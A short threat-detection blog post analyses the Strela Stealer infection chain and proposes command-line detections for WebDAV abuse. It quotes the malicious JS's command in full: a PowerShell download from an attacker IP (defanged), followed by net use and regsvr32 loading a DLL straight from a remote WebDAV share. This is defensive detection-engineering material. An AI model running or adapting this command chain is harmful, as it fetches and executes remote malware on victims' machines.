043. Strela Stealer: Detecting WebDAV Abuse

Hello everyone! Have you ever seen adversaries use WebDAV servers to host malware? Yes, of course! So today we're going to look at detection opportunities related to such activity.


Let's look at a recent Strela Stealer infection chain, presented by Unit42. The threat actors distributed the stealer through email attachments: zip archives containing JS files.

So, the JS file executes the following script:

cmd /c powershell.exe -Command "Invoke-WebRequest -OutFile %temp%\\invoice.pdf hxxp[:]//193.143.1[.]205/invoice.php" && start %temp%\\invoice.pdf && cmd /c net use \\\\193.143.1[.]205@8888\\davwwwroot\\ && cmd /c regsvr32 /s \\\\193.143.1[.]205@8888\\davwwwroot\\281681957614368.dll

OK, the threat actors abuse PowerShell here, but not to download the malware itself: it only downloads and saves a decoy document.

Next, the most interesting part: the use of WebDAV. The DLL is mapped with net use and then loaded with regsvr32 straight from the WebDAV share. Here's what to look for:

  • Execution of net with "use" and "davwwwroot" in the command line
  • Execution of regsvr32 or rundll32 with "davwwwroot" in the command line

Quite easy, right?

See you tomorrow!
